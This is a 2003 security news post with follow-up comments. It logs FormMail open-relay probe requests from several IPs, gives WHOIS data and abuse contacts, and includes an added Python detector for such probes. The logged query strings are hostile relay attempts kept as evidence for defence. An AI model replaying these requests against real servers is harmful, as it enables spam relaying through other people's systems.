Beware Attacker from IP 200.55.7.235 and Whole 200.x.x.x Block
Crack Attack
Due to recent PHP-Nuke sites being successfully attacked, as noticed here and reported here, I checked my logs today and noticed a slice of the following crack attempts, which were not successful.
========================================
Request: 200.55.7.235 - - [Sun Feb 2 12:49:56 2003] GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/FormMail.pl&message=ro
[email protected] HTTP/1.0 302 358
Handler: cgi-script
----------------------------------------
GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/[email protected] HTTP/1.0
Connection: Keep-Alive
Host: correo.cfired.org.ar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Via: 1.0 PROXY

HTTP/1.0 302 Found
Location: http://www.computercops.biz/cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/FormMail.pl&message=rockstar&recipient=good
[email protected]
Connection: close
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 200.55.7.235 - - [Sun Feb 2 12:49:57 2003] GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/formmail.cgi&message=
[email protected] HTTP/1.0 302 360
Handler: cgi-script
----------------------------------------
GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/[email protected] HTTP/1.0
Connection: Keep-Alive
Host: correo.cfired.org.ar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Via: 1.0 PROXY

HTTP/1.0 302 Found
Location: http://www.computercops.biz/cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/formmail.cgi&message=rockstar&recipient=go
[email protected]
Connection: close
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 200.55.7.235 - - [Sun Feb 2 12:49:59 2003] GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/formmail.pl&message=ro
[email protected] HTTP/1.0 302 358
Handler: cgi-script
----------------------------------------
GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/[email protected] HTTP/1.0
Connection: Keep-Alive
Host: correo.cfired.org.ar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Via: 1.0 PROXY

HTTP/1.0 302 Found
Location: http://www.computercops.biz/cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/formmail.pl&message=rockstar&recipient=good
[email protected]
Connection: close
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 200.55.7.235 - - [Sun Feb 2 12:49:59 2003] GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/FormMail.cgi&message=
[email protected] HTTP/1.0 302 360
Handler: cgi-script
----------------------------------------
GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/[email protected] HTTP/1.0
Connection: Keep-Alive
Host: correo.cfired.org.ar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Via: 1.0 PROXY

HTTP/1.0 302 Found
Location: http://www.computercops.biz/cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/FormMail.cgi&message=rockstar&recipient=go
[email protected]
Connection: close
Content-Type: text/html; charset=iso-8859-1


PHPNuke.org was cracked, but not due to PHP-Nuke itself. In this article are more reports of black hatters that all appear to be from the 200.x.x.x IP block. Brazil?

Checking SamSpade (source), the IP resolves to:

correo.cfired.org.ar

Here is the complete WHOIS for that IP:

Trying whois -h whois.arin.net 200.55.7.235

OrgName: Latin American and Caribbean IP address Regional Registry
OrgID: LACNIC

NetRange: 200.0.0.0 - 200.255.255.255
CIDR: 200.0.0.0/8
NetName: LACNIC-200
NetHandle: NET-200-0-0-0-1
Parent:
NetType: Allocated to LACNIC
NameServer: ARROWROOT.ARIN.NET
NameServer: BUCHU.ARIN.NET
NameServer: CHIA.ARIN.NET
NameServer: DILL.ARIN.NET
NameServer: NS.LACNIC.ORG
NameServer: NS.DNS.BR
NameServer: NS2.DNS.BR
Comment: This IP address range is under LACNIC responsibility for further
allocations to users in LACNIC region.
Please see http://www.lacnic.net/ for further details, or check the
WHOIS server located at whois.lacnic.net
RegDate: 2002-07-27
Updated: 2002-12-12

TechHandle: LACNIC-ARIN
TechName: LACNIC Hostmaster
TechPhone: (+55) 11 5509-3525
TechEmail: [email protected]

OrgTechHandle: LACNIC-ARIN
OrgTechName: LACNIC Hostmaster
OrgTechPhone: (+55) 11 5509-3525
OrgTechEmail: [email protected]

# ARIN Whois database, last updated 2003-02-01 20:00
# Enter ? for additional hints on searching ARIN's Whois database.


Rest assured they will be contacted today linking back to this news article.

Lacnic's Contact Us page:

CONTACT US

LACNIC
Potosi 1517
Montevideo, 11500
Uruguay

Phone: (598) 2 6062822 - (598) 2 6015846
Fax - (598) 2 6015509
[email protected]

OPERATIONAL CENTER / REGISTRATION SERVICES
São Paulo, Brazil

Phone: (+55) 11 5509-3525 - From 8:30 am to 5:30 pm (GMT -4)
[email protected]

MEMBERSHIP
[email protected]

WEBMASTER
[email protected]

NETWORK ABUSE
[email protected]



If you are seeing these, be sure to report it immediately. A copy of this text will also be sent to US Federal Agencies.

Links back to this article have been posted here, here, and here.


Note: No harm has been done. Be sure to also read more data here and here to shore up your defenses.
Posted on Sunday, 02 February 2003 @ 16:26:13 EST by Paul
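As an added example (not part of the original post), a small Python detector for the pattern in the log slice above: requests for formmail.pl or formmail.cgi under any capitalisation, split into bare probes and relay attempts that carry a recipient= parameter, plus a check for the relay abuser's habit of putting the script's own URL into subject=. The sample log lines are constructed in the post's "Request:" layout; the e-mail addresses in them are placeholders, since the real ones were not recoverable from the page.

```python
"""Flag FormMail open-relay probes in web server log lines (added example)."""
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in the "Request:" layout of the post above; the
# e-mail addresses are placeholders, not the values from the real logs.
SAMPLE_LOG = """\
Request: 200.55.7.235 - - [Sun Feb 2 12:49:56 2003] GET /cgi-bin/FormMail.pl?email=probe@example.invalid&subject=www.computercops.biz/cgi-bin/FormMail.pl&message=rockstar&recipient=drop@example.invalid HTTP/1.0 302 358
Request: 200.55.7.235 - - [Sun Feb 2 12:49:57 2003] GET /cgi-bin/formmail.cgi?email=probe@example.invalid&subject=www.computercops.biz/cgi-bin/formmail.cgi&message=rockstar&recipient=drop@example.invalid HTTP/1.0 302 360
Request: 196.30.134.10 - - [Tue Feb 4 00:50:11 2003] GET /cgi-bin/formmail.pl HTTP/1.0 302 227
Request: 10.0.0.5 - - [Tue Feb 4 01:00:00 2003] GET /modules.php?name=News&file=article&sid=590 HTTP/1.0 200 8123
"""

LINE_RE = re.compile(
    r"^Request: (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "
    r"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d (?P<status>\d{3})"
)
# Match the script name under any capitalisation: FormMail.pl, formmail.cgi, ...
FORMMAIL_RE = re.compile(r"/formmail\.(pl|cgi)$", re.IGNORECASE)

def classify(line):
    """Return None for ordinary lines, else a dict describing the FormMail hit."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if not FORMMAIL_RE.search(parts.path):
        return None
    qs = parse_qs(parts.query)
    return {
        "ip": m["ip"],
        "path": parts.path,
        "status": int(m["status"]),
        # recipient= means someone tried to send mail through the script;
        # a bare GET is just a check for whether the script exists.
        "kind": "relay_attempt" if "recipient" in qs else "probe",
        # Relay abusers put the script's own URL into subject= so a message
        # that gets through tells them which host is an open relay.
        "tags_host": any(FORMMAIL_RE.search(s) for s in qs.get("subject", [])),
    }

def summarize(log_text):
    """Return all FormMail hits and a per-source-IP count by kind."""
    hits = [h for h in map(classify, log_text.splitlines()) if h]
    per_ip = defaultdict(Counter)
    for h in hits:
        per_ip[h["ip"]][h["kind"]] += 1
    return hits, dict(per_ip)
```

Run it over a real access log by feeding the file's text to summarize(); any source with relay_attempt hits is a candidate for the abuse report described in the post.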
Re: Beware Attacker from IP 200.55.7.235 and Whole 200.x.x.x Block (Score: 1)
by Paul on Monday, 03 February 2003 @ 05:39:35 EST (http://COMPUTERCOPS.BIZ)
whois -h whois.lacnic.net 200.55.7.235

% Copyright LACNIC lacnic.net
% The data below is provided for information purposes
% and to assist persons in obtaining information about or
% related to AS and IP numbers registrations
% By submitting a whois query, you agree to use this data
% only for lawful purposes.
% 2003-02-03 08:38:45 (BRST -02:00)

inetnum: 200.55.7.232/29
status: reassigned
owner: Consejo Fed. de Inv.
ownerid: AR-CFIN-LACNIC
address: SAN MARTIN 871
address: Capital Federal, Buenos Aires 1111
country: AR
owner-c: OC198-ARIN
created: 20010716
changed: 20010716
inetnum-up: 200.55.0/18
source: ARIN-LACNIC-TRANSITION

nic-hdl: OC198-ARIN
person: O'Flaherty Christian
e-mail: [email protected]
address: Impsat
address: Alferez Pareja 256
address: Buenos Aires, C1107BJD
country: AR
phone: 54 11 4362 4240
source: ARIN-LACNIC-TRANSITION



Re: Beware Attacker from IP 200.55.7.235 and Whole 200.x.x.x Block (Score: 1)
by Paul on Tuesday, 04 February 2003 @ 03:13:57 EST (http://COMPUTERCOPS.BIZ)
Lately I just feel like posting snippets of these cracking attempts to alert the public to these idiots:

========================================
Request: 200.63.160.161 - - [Mon Feb 3 10:13:08 2003] GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/FormMail.pl&message=rockstar&recipient=good HTTP/1.0 302 298
Handler: cgi-script
----------------------------------------
GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/FormMail.pl&message=rockstar&recipient=good HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Encoding: gzip, deflate
Accept-Language: es-ar
Cache-Control: max-age=259200
Connection: keep-alive
Cookie: lang=english; anno=MDMwMjAzMTAxMjIxOg%3D%3D
Host: www.computercops.biz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Via: 1.1 lapetisa.abackcomputers.ods.org:3128 (Squid/2.4.STABLE3)
X-Forwarded-For: 192.168.22.65

HTTP/1.0 302 Found
Location: http://www.computercops.biz/modules.php?name=News&file=article&sid=590&mode=thread&order=0&thold=0
Connection: close
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 196.30.134.10 - - [Tue Feb 4 00:50:11 2003] GET /cgi-bin/formmail.pl HTTP/1.0 302 227
Handler: cgi-script
----------------------------------------
GET /cgi-bin/formmail.pl HTTP/1.0
Cache-Control: max-stale=0
Connection: Keep-Alive
Host: www.COMPUTERCOPS.org
Referer: http://www.COMPUTERCOPS.org/

HTTP/1.0 302 Found
Location: http://www.computercops.biz/cgi-bin/formmail.pl
Connection: close
Content-Type: text/html; charset=iso-8859-1



Re: Beware Attacker from IP 200.55.7.235 and Whole 200.x.x.x Block (Score: 1)
by Paul on Tuesday, 04 February 2003 @ 15:27:31 EST (http://COMPUTERCOPS.BIZ)
Another slice, another IP:

========================================
Request: 68.66.19.85 - - [Tue Feb 4 08:13:58 2003] GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/formmail.cgi&message=rockstar&recipient=go HTTP/1.0 302 298
Handler: cgi-script
----------------------------------------
GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/formmail.cgi&message=rockstar&recipient=go HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Host: www.computercops.biz
Pragma: no-cache
User-Agent: Mozilla/3.0 (compatible)

HTTP/1.0 302 Found
Location: http://www.computercops.biz/modules.php?name=News&file=article&sid=590&mode=thread&order=0&thold=0
Connection: close
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 68.66.19.85 - - [Tue Feb 4 08:17:54 2003] GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/FormMail.pl&message=rockstar&recipient=good HTTP/1.0 302 298
Handler: cgi-script
----------------------------------------
GET /cgi-bin/[email protected]&subject=www.computercops.biz/cgi-bin/FormMail.pl&message=rockstar&recipient=good HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Host: www.computercops.biz
Pragma: no-cache
User-Agent: Mozilla/3.0 (compatible)

HTTP/1.0 302 Found
Location: http://www.computercops.biz/modules.php?name=News&file=article&sid=590&mode=thread&order=0&thold=0
Connection: close
Content-Type: text/html; charset=iso-8859-1